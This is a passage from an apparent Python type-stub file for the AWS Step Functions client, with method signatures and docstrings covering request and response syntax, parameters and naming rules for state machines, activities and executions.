The name of the activity to create. This name must be unique for your AWS account and region for 90 days. For more information, see `Limits Related to State Machine Executions <https://docs.aws.amazon.com/step-functions/latest/dg/limits.html#service-limits-state-machine-executions>`__ in the *AWS Step Functions Developer Guide* .
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``\" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
:type tags: list
:param tags:
The list of tags to add to a resource.
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:rtype: dict
:returns:
"""
pass
def create_state_machine(self, name: str, definition: str, roleArn: str, tags: List = None) -> Dict:
"""
Creates a state machine. A state machine consists of a collection of states that can do work (``Task`` states), determine to which states to transition next (``Choice`` states), stop an execution with an error (``Fail`` states), and so on. State machines are specified using a JSON-based, structured language.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/CreateStateMachine>`_
**Request Syntax**
::
response = client.create_state_machine(
name='string',
definition='string',
roleArn='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'stateMachineArn': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the created state machine.
- **creationDate** *(datetime) --*
The date the state machine is created.
:type name: string
:param name: **[REQUIRED]**
The name of the state machine.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``\" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
:type definition: string
:param definition: **[REQUIRED]**
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
:type roleArn: string
:param roleArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the IAM role to use for this state machine.
:type tags: list
:param tags:
Tags to be added when creating a state machine.
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:rtype: dict
:returns:
"""
pass
def delete_activity(self, activityArn: str) -> Dict:
"""
Deletes an activity.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DeleteActivity>`_
**Request Syntax**
::
response = client.delete_activity(
activityArn='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type activityArn: string
:param activityArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the activity to delete.
:rtype: dict
:returns:
"""
pass
def delete_state_machine(self, stateMachineArn: str) -> Dict:
"""
Deletes a state machine. This is an asynchronous operation: It sets the state machine's status to ``DELETING`` and begins the deletion process. Each state machine execution is deleted the next time it makes a state transition.
.. note::
The state machine itself is deleted after all executions are completed or deleted.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DeleteStateMachine>`_
**Request Syntax**
::
response = client.delete_state_machine(
stateMachineArn='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine to delete.
:rtype: dict
:returns:
"""
pass
def describe_activity(self, activityArn: str) -> Dict:
"""
Describes an activity.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeActivity>`_
**Request Syntax**
::
response = client.describe_activity(
activityArn='string'
)
**Response Syntax**
::
{
'activityArn': 'string',
'name': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **activityArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the activity.
- **name** *(string) --*
The name of the activity.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **creationDate** *(datetime) --*
The date the activity is created.
:type activityArn: string
:param activityArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the activity to describe.
:rtype: dict
:returns:
"""
pass
def describe_execution(self, executionArn: str) -> Dict:
"""
Describes an execution.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeExecution>`_
**Request Syntax**
::
response = client.describe_execution(
executionArn='string'
)
**Response Syntax**
::
{
'executionArn': 'string',
'stateMachineArn': 'string',
'name': 'string',
'status': 'RUNNING'|'SUCCEEDED'|'FAILED'|'TIMED_OUT'|'ABORTED',
'startDate': datetime(2015, 1, 1),
'stopDate': datetime(2015, 1, 1),
'input': 'string',
'output': 'string'
}
**Response Structure**
- *(dict) --*
- **executionArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the execution.
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) of the executed stated machine.
- **name** *(string) --*
The name of the execution.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **status** *(string) --*
The current status of the execution.
- **startDate** *(datetime) --*
The date the execution is started.
- **stopDate** *(datetime) --*
If the execution has already ended, the date the execution stopped.
- **input** *(string) --*
The string that contains the JSON input data of the execution.
- **output** *(string) --*
The JSON output data of the execution.
.. note::
This field is set only if the execution succeeds. If the execution fails, this field is null.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution to describe.
:rtype: dict
:returns:
"""
pass
def describe_state_machine(self, stateMachineArn: str) -> Dict:
"""
Describes a state machine.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeStateMachine>`_
**Request Syntax**
::
response = client.describe_state_machine(
stateMachineArn='string'
)
**Response Syntax**
::
{
'stateMachineArn': 'string',
'name': 'string',
'status': 'ACTIVE'|'DELETING',
'definition': 'string',
'roleArn': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the state machine.
- **name** *(string) --*
The name of the state machine.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **status** *(string) --*
The current status of the state machine.
- **definition** *(string) --*
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role used when creating this state machine. (The IAM role maintains security by granting Step Functions access to AWS resources.)
- **creationDate** *(datetime) --*
The date the state machine is created.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine to describe.
:rtype: dict
:returns:
"""
pass
def describe_state_machine_for_execution(self, executionArn: str) -> Dict:
"""
Describes the state machine associated with a specific execution.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeStateMachineForExecution>`_
**Request Syntax**
::
response = client.describe_state_machine_for_execution(
executionArn='string'
)
**Response Syntax**
::
{
'stateMachineArn': 'string',
'name': 'string',
'definition': 'string',
'roleArn': 'string',
'updateDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) of the state machine associated with the execution.
- **name** *(string) --*
The name of the state machine associated with the execution.
- **definition** *(string) --*
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role of the State Machine for the execution.
- **updateDate** *(datetime) --*
The date and time the state machine associated with an execution was updated. For a newly created state machine, this is the creation date.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution you want state machine information for.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_activity_task(self, activityArn: str, workerName: str = None) -> Dict:
"""
Used by workers to retrieve a task (with the specified activity ARN) which has been scheduled for execution by a running state machine. This initiates a long poll, where the service holds the HTTP connection open and responds as soon as a task becomes available (i.e. an execution of a task of this type is needed.) The maximum time the service holds on to the request before responding is 60 seconds. If no task is available within 60 seconds, the poll returns a ``taskToken`` with a null string.
.. warning::
Workers should set their client side socket timeout to at least 65 seconds (5 seconds higher than the maximum time the service may hold the poll request).
Polling with ``GetActivityTask`` can cause latency in some implementations. See `Avoid Latency When Polling for Activity Tasks <https://docs.aws.amazon.com/step-functions/latest/dg/bp-activity-pollers.html>`__ in the Step Functions Developer Guide.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/GetActivityTask>`_
**Request Syntax**
::
response = client.get_activity_task(
activityArn='string',
workerName='string'
)
**Response Syntax**
::
{
'taskToken': 'string',
'input': 'string'
}
**Response Structure**
- *(dict) --*
- **taskToken** *(string) --*
A token that identifies the scheduled task. This token must be copied and included in subsequent calls to SendTaskHeartbeat , SendTaskSuccess or SendTaskFailure in order to report the progress or completion of the task.
- **input** *(string) --*
The string that contains the JSON input data for the task.
:type activityArn: string
:param activityArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the activity to retrieve tasks from (assigned when you create the task using CreateActivity .)
:type workerName: string
:param workerName:
You can provide an arbitrary name in order to identify the worker that the task is assigned to. This name is used when it is logged in the execution history.
:rtype: dict
:returns:
"""
pass
def get_execution_history(self, executionArn: str, maxResults: int = None, reverseOrder: bool = None, nextToken: str = None) -> Dict:
"""
Returns the history of the specified execution as a list of events. By default, the results are returned in ascending order of the ``timeStamp`` of the events. Use the ``reverseOrder`` parameter to get the latest events first.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/GetExecutionHistory>`_
**Request Syntax**
::
response = client.get_execution_history(
executionArn='string',
maxResults=123,
reverseOrder=True|False,
nextToken='string'
)
**Response Syntax**
::
{
'events': [
{
'timestamp': datetime(2015, 1, 1),
'type': 'ActivityFailed'|'ActivityScheduleFailed'|'ActivityScheduled'|'ActivityStarted'|'ActivitySucceeded'|'ActivityTimedOut'|'ChoiceStateEntered'|'ChoiceStateExited'|'TaskFailed'|'TaskScheduled'|'TaskStartFailed'|'TaskStarted'|'TaskSubmitFailed'|'TaskSubmitted'|'TaskSucceeded'|'TaskTimedOut'|'ExecutionFailed'|'ExecutionStarted'|'ExecutionSucceeded'|'ExecutionAborted'|'ExecutionTimedOut'|'FailStateEntered'|'LambdaFunctionFailed'|'LambdaFunctionScheduleFailed'|'LambdaFunctionScheduled'|'LambdaFunctionStartFailed'|'LambdaFunctionStarted'|'LambdaFunctionSucceeded'|'LambdaFunctionTimedOut'|'SucceedStateEntered'|'SucceedStateExited'|'TaskStateAborted'|'TaskStateEntered'|'TaskStateExited'|'PassStateEntered'|'PassStateExited'|'ParallelStateAborted'|'ParallelStateEntered'|'ParallelStateExited'|'ParallelStateFailed'|'ParallelStateStarted'|'ParallelStateSucceeded'|'WaitStateAborted'|'WaitStateEntered'|'WaitStateExited',
'id': 123,
'previousEventId': 123,
'activityFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'activityScheduleFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'activityScheduledEventDetails': {
'resource': 'string',
'input': 'string',
'timeoutInSeconds': 123,
'heartbeatInSeconds': 123
},
'activityStartedEventDetails': {
'workerName': 'string'
},
'activitySucceededEventDetails': {
'output': 'string'
},
'activityTimedOutEventDetails': {
'error': 'string',
'cause': 'string'
},
'taskFailedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'taskScheduledEventDetails': {
'resourceType': 'string',
'resource': 'string',
'region': 'string',
'parameters': 'string',
'timeoutInSeconds': 123
},
'taskStartFailedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'taskStartedEventDetails': {
'resourceType': 'string',
'resource': 'string'
},
'taskSubmitFailedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'taskSubmittedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'output': 'string'
},
'taskSucceededEventDetails': {
'resourceType': 'string',
'resource': 'string',
'output': 'string'
},
'taskTimedOutEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'executionFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'executionStartedEventDetails': {
'input': 'string',
'roleArn': 'string'
},
'executionSucceededEventDetails': {
'output': 'string'
},
'executionAbortedEventDetails': {
'error': 'string',
'cause': 'string'
},
'executionTimedOutEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionScheduleFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionScheduledEventDetails': {
'resource': 'string',
'input': 'string',
'timeoutInSeconds': 123
},
'lambdaFunctionStartFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionSucceededEventDetails': {
'output': 'string'
},
'lambdaFunctionTimedOutEventDetails': {
'error': 'string',
'cause': 'string'
},
'stateEnteredEventDetails': {
'name': 'string',
'input': 'string'
},
'stateExitedEventDetails': {
'name': 'string',
'output': 'string'
}
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **events** *(list) --*
The list of events that occurred in the execution.
- *(dict) --*
Contains details about the events of an execution.
- **timestamp** *(datetime) --*
The date and time the event occurred.
- **type** *(string) --*
The type of the event.
- **id** *(integer) --*
The id of the event. Events are numbered sequentially, starting at one.
- **previousEventId** *(integer) --*
The id of the previous event.
- **activityFailedEventDetails** *(dict) --*
Contains details about an activity that failed during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **activityScheduleFailedEventDetails** *(dict) --*
Contains details about an activity schedule event that failed during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **activityScheduledEventDetails** *(dict) --*
Contains details about an activity scheduled during an execution.
- **resource** *(string) --*
The Amazon Resource Name (ARN) of the scheduled activity.
- **input** *(string) --*
The JSON data input to the activity task.
- **timeoutInSeconds** *(integer) --*
The maximum allowed duration of the activity task.
- **heartbeatInSeconds** *(integer) --*
The maximum allowed duration between two heartbeats for the activity task.
- **activityStartedEventDetails** *(dict) --*
Contains details about the start of an activity during an execution.
- **workerName** *(string) --*
The name of the worker that the task is assigned to. These names are provided by the workers when calling GetActivityTask .
- **activitySucceededEventDetails** *(dict) --*
Contains details about an activity that successfully terminated during an execution.
- **output** *(string) --*
The JSON data output by the activity task.
- **activityTimedOutEventDetails** *(dict) --*
Contains details about an activity timeout that occurred during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the timeout.
- **taskFailedEventDetails** *(dict) --*
Contains details about the failure of a task.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **taskScheduledEventDetails** *(dict) --*
Contains details about a task that was scheduled.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **region** *(string) --*
The region of the scheduled task
- **parameters** *(string) --*
The JSON data passed to the resource referenced in a task state.
- **timeoutInSeconds** *(integer) --*
The maximum allowed duration of the task.
- **taskStartFailedEventDetails** *(dict) --*
Contains details about a task that failed to start.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **taskStartedEventDetails** *(dict) --*
Contains details about a task that was started.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **taskSubmitFailedEventDetails** *(dict) --*
Contains details about a task that where the submit failed.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **taskSubmittedEventDetails** *(dict) --*
Contains details about a submitted task.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **output** *(string) --*
The response from a resource when a task has started.
- **taskSucceededEventDetails** *(dict) --*
Contains details about a task that succeeded.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **output** *(string) --*
The full JSON response from a resource when a task has succeeded. This response becomes the output of the related task.
- **taskTimedOutEventDetails** *(dict) --*
Contains details about a task that timed out.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **executionFailedEventDetails** *(dict) --*
Contains details about an execution failure event.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **executionStartedEventDetails** *(dict) --*
Contains details about the start of the execution.
- **input** *(string) --*
The JSON data input to the execution.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role used for executing AWS Lambda tasks.
- **executionSucceededEventDetails** *(dict) --*
Contains details about the successful termination of the execution.
- **output** *(string) --*
The JSON data output by the execution.
- **executionAbortedEventDetails** *(dict) --*
Contains details about an abort of an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **executionTimedOutEventDetails** *(dict) --*
Contains details about the execution timeout that occurred during the execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the timeout.
- **lambdaFunctionFailedEventDetails** *(dict) --*
Contains details about a lambda function that failed during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **lambdaFunctionScheduleFailedEventDetails** *(dict) --*
Contains details about a failed lambda function schedule event that occurred during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **lambdaFunctionScheduledEventDetails** *(dict) --*
Contains details about a lambda function scheduled during an execution.
- **resource** *(string) --*
The Amazon Resource Name (ARN) of the scheduled lambda function.
- **input** *(string) --*
The JSON data input to the lambda function.
- **timeoutInSeconds** *(integer) --*
The maximum allowed duration of the lambda function.
- **lambdaFunctionStartFailedEventDetails** *(dict) --*
Contains details about a lambda function that failed to start during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **lambdaFunctionSucceededEventDetails** *(dict) --*
Contains details about a lambda function that terminated successfully during an execution.
- **output** *(string) --*
The JSON data output by the lambda function.
- **lambdaFunctionTimedOutEventDetails** *(dict) --*
Contains details about a lambda function timeout that occurred during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the timeout.
- **stateEnteredEventDetails** *(dict) --*
Contains details about a state entered during an execution.
- **name** *(string) --*
The name of the state.
- **input** *(string) --*
The string that contains the JSON input data for the state.
- **stateExitedEventDetails** *(dict) --*
Contains details about an exit from a state during an execution.
- **name** *(string) --*
The name of the state.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **output** *(string) --*
The JSON output data of the state.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type reverseOrder: boolean
:param reverseOrder:
Lists events in descending order of their ``timeStamp`` .
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_activities(self, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the existing activities.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListActivities>`_
**Request Syntax**
::
response = client.list_activities(
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'activities': [
{
'activityArn': 'string',
'name': 'string',
'creationDate': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **activities** *(list) --*
The list of activities.
- *(dict) --*
Contains details about an activity.
- **activityArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the activity.
- **name** *(string) --*
The name of the activity.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **creationDate** *(datetime) --*
The date the activity is created.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def list_executions(self, stateMachineArn: str, statusFilter: str = None, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the executions of a state machine that meet the filtering criteria. Results are sorted by time, with the most recent execution first.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListExecutions>`_
**Request Syntax**
::
response = client.list_executions(
stateMachineArn='string',
statusFilter='RUNNING'|'SUCCEEDED'|'FAILED'|'TIMED_OUT'|'ABORTED',
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'executions': [
{
'executionArn': 'string',
'stateMachineArn': 'string',
'name': 'string',
'status': 'RUNNING'|'SUCCEEDED'|'FAILED'|'TIMED_OUT'|'ABORTED',
'startDate': datetime(2015, 1, 1),
'stopDate': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **executions** *(list) --*
The list of matching executions.
- *(dict) --*
Contains details about an execution.
- **executionArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the execution.
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) of the executed state machine.
- **name** *(string) --*
The name of the execution.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **status** *(string) --*
The current status of the execution.
- **startDate** *(datetime) --*
The date the execution started.
- **stopDate** *(datetime) --*
If the execution already ended, the date the execution stopped.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine whose executions is listed.
:type statusFilter: string
:param statusFilter:
If specified, only list the executions whose current execution status matches the given filter.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def list_state_machines(self, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the existing state machines.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListStateMachines>`_
**Request Syntax**
::
response = client.list_state_machines(
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'stateMachines': [
{
'stateMachineArn': 'string',
'name': 'string',
'creationDate': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **stateMachines** *(list) --*
- *(dict) --*
Contains details about the state machine.
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the state machine.
- **name** *(string) --*
The name of the state machine.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **creationDate** *(datetime) --*
The date the state machine is created.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
